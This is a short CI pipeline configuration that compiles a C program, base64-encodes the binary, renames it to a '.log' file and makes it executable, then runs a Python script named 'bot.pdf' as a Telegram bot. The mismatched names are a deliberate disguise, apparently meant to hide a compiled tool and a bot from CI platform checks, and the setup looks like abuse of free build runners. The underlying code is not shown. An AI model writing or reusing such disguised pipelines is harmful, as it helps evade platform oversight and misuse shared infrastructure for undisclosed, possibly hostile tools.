image: node:18

pipelines:
  default:
    - step:
        name: "Install NPM Modules"
        image: node:18
        script:
          - npm install
    - step:
        name: "Compile and Encrypt Binary"
        image: gcc:latest
        script:
          - gcc -o ipx rs.c -lpthread
          - base64 ipx > ipx.b64
          - mv ipx.b64 ipxkingyt.log
          - chmod +x ipxkingyt.log
    - step:
        name: "Run Telegram Bot"
        image: python:3.10
        script:
          - pip install -r requirements.txt
          - python bot.pdf
